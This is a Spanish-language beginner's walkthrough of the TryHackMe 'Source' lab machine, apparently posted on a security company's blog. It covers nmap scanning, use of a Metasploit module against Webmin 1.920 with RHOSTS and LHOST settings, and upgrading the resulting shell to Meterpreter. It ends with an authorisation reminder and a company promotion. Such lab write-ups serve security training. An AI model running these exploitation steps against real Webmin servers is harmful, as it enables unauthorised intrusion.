Manual de Pentesting para Principiantes Utilizando la Máquina Source TryHackMe. Máquina para empezar en el pentesting y en el uso de herramientas como nmap y metasploit

Parte 1: Preparación

Antes de comenzar con el pentesting en la máquina Source, es importante realizar algunas configuraciones iniciales.

Paso 1: Crear directorio de trabajo y editar el archivo de hosts Source TryHackMe

  • Descripción: Para organizar el proyecto, crearemos un directorio de trabajo y editaremos el archivo de hosts para asociar la dirección IP de la máquina objetivo con un nombre de dominio.
  • Comandos:
  • Crear directorio de trabajo: Abre una terminal y ejecuta el siguiente comando: mkdir directorio_trabajo
  • Editar archivo hosts: Ejecuta nano /etc/hosts para abrir el archivo hosts en el editor de texto.
  • Agregar la siguiente línea al archivo hosts: <ip_maquina> nombredominio (reemplaza <ip_maquina> con la dirección IP de la máquina objetivo y «nombredominio» con el nombre que desees asignar).

Parte 2: Escaneo y Reconocimiento de Source TryHackMe

El escaneo y reconocimiento son pasos fundamentales en un pentesting. Nos permiten obtener información sobre la máquina objetivo y los servicios que están en ejecución.

Paso 2: Realizar ping a la máquina y descubrir el TTL

  • Descripción: Realiza un ping a la dirección IP de la máquina objetivo para verificar que está en línea y obtener información como el TTL (Time To Live).
  • Comando: Abre una terminal y ejecuta el siguiente comando: ping -c 1 <ip_maquina>
  • TTL: El TTL obtenido en la respuesta del ping puede ayudarnos a identificar el sistema operativo de la máquina objetivo. Un TTL de 63 generalmente indica un sistema operativo Linux.
Source Tryhackme Ping

Paso 3: Hacer un primer escaneo con nmap en Source TryHackMe

  • Descripción: Realiza un escaneo de puertos básico utilizando nmap para identificar los servicios asociados a los puertos abiertos.
  • Comando: En la terminal, ejecuta: nmap -sVC -oN nmap_source <ip_maquina>
  • Servicios encontrados:
  • Puerto 22: El servicio asociado al puerto 22 es SSH (Secure Shell), que proporciona un acceso remoto seguro a la máquina.
  • Puerto 10000: Es posible que este puerto esté asociado a Webmin, un panel de administración web para sistemas Unix.
Source Tryhackme Nmap 1

Parte 3: Escaneo Completo y Detección de Vulnerabilidades en Source TryHackMe

El siguiente paso es realizar un escaneo completo de puertos en la máquina objetivo y utilizar herramientas para detectar vulnerabilidades.

Paso 4: Escaneo completo de la máquina con nmap

  • Descripción: Realiza un escaneo completo de puertos en la máquina objetivo, identificando los servicios y versiones asociados a cada puerto. También utiliza scripts de detección de vulnerabilidades.
  • Comando: Ejecuta en la terminal: nmap -p 22,10000 -sCVS --min-rate 5000 -v -n -Pn <ip_maquina> -oN nmap_source_completo
  • Desglose de los comandos:
  • -p 22,10000: Escanea únicamente los puertos 22 y 10000.
  • -sCVS: Realiza un escaneo de versiones y scripts de detección de vulnerabilidades.
  • --min-rate 5000: Establece una tasa mínima de envío de paquetes para acelerar el escaneo.
  • -v: Activa el modo verboso para obtener más información detallada.
  • -n: Desactiva la resolución de nombres DNS.
  • -Pn: Ignora el descubrimiento de host y trata todas las direcciones como en línea.
  • -oN nmap_source_completo: Guarda los resultados en un archivo llamado «nmap_source_completo».
Source Tryhackme Nmap 2

Paso 5: Búsqueda de exploits para versiones vulnerables

  • Descripción: Busca exploits disponibles en Metasploit para las versiones específicas de OpenSSH (7.6p1) y Webmin (1.920).
  • Comandos en Metasploit:
  • Ejecuta msfconsole en la terminal para iniciar Metasploit.
  • Utiliza search webmin 1.920 para buscar exploits relacionados con Webmin 1.920.
  • Selecciona el exploit específico que deseas utilizar con el comando use X.
Source Tryhackme Metasploit Search Sploit
  • Utiliza options para ver y configurar las opciones del exploit seleccionado.
  • Establece la dirección IP de la máquina objetivo como objetivo del exploit con el comando set RHOSTS <ip_maquina>.
  • Establece la dirección IP de la interfaz «tun0» o la dirección IP de tu VPN como dirección de origen del exploit con el comando set LHOST tun0.
  • Habilita el uso de SSL en la comunicación con set SSL yes.
  • Ejecuta el exploit con el comando run y realiza el intento de explotación.
Source Tryhackme Metaesploit Definitions

Parte 4: Mejora de la Shell y Exploración

Después de obtener acceso a la máquina objetivo, podemos mejorar la shell y explorar los directorios y archivos relevantes en busca de banderas o evidencias.

Paso 6: Mejora de la shell con Meterpreter

  • Descripción: Mejora la shell obtenida mediante el exploit utilizando Meterpreter para obtener capacidades avanzadas.
  • Comandos en Metasploit:
  • Presiona Ctrl + Z para poner en pausa Metasploit y acceder al shell.
  • Utiliza search shell_to_meterpreter para buscar una carga útil compatible con la mejora de shell a Meterpreter.
  • Selecciona la carga útil específica que deseas utilizar con el comando use 0.
  • Establece la sesión en la que se encuentra la shell para la mejora a Meterpreter con set SESSION 1.
  • Ejecuta la carga útil y realiza la mejora de shell con el comando run.
Source Tryhackme Shell To Meterpreter Run
  • Para acceder a Meterpreter, utiliza el comando sessions 2.
Source Tryhackme Meterpreter Session

Paso 7: Exploración y búsqueda de banderas

  • Descripción: Una vez obtenido el acceso a la máquina, explora los directorios y archivos relevantes para encontrar las banderas o evidencias requeridas.

¡Enhorabuena! Has realizado los pasos necesarios para escanear, identificar vulnerabilidades y obtener acceso a la máquina objetivo. Recuerda que este manual es con fines educativos y solo debe ser utilizado en sistemas y redes donde tengas autorización para realizar pruebas de penetración.

Source Trayhackme Hackeada

Resumen y Tipo de Máquina de Source TryHackMe

En este manual, hemos cubierto los pasos esenciales para realizar un pentesting en la máquina Source. Comenzamos preparando nuestro entorno de trabajo y editando el archivo de hosts para asociar la dirección IP de la máquina objetivo con un nombre de dominio.

Luego, realizamos un escaneo inicial utilizando nmap para identificar los servicios asociados a los puertos abiertos. Continuamos con un escaneo completo de la máquina objetivo, utilizando nmap para obtener información detallada sobre los servicios y versiones.

A continuación, exploramos la búsqueda de exploits para versiones vulnerables en Metasploit y utilizamos diferentes comandos para configurar y ejecutar un exploit específico.

Una vez obtenido el acceso a la máquina, mejoramos nuestra shell utilizando Meterpreter para obtener capacidades avanzadas y exploramos los directorios y archivos relevantes en busca de banderas o evidencias.

En resumen, hemos seguido una metodología de pentesting que abarca desde el escaneo y reconocimiento inicial hasta la explotación y la exploración de la máquina objetivo.

Confía en DCSeguridad

Si estás interesado en fortalecer la seguridad de tu empresa y proteger tu red contra posibles vulnerabilidades, te invitamos a contactar a DCSeguridad. Somos expertos en ciberseguridad y podemos ayudarte a evaluar y mejorar la seguridad de tu infraestructura. También te invitamos a unirte a nuestro canal de Telegram, donde compartimos información relevante sobre seguridad y te mantendremos al tanto de las últimas noticias y tendencias en el campo de la ciberseguridad.

¡No esperes más para proteger tu empresa! Contáctanos y fortalece tu seguridad hoy mismo.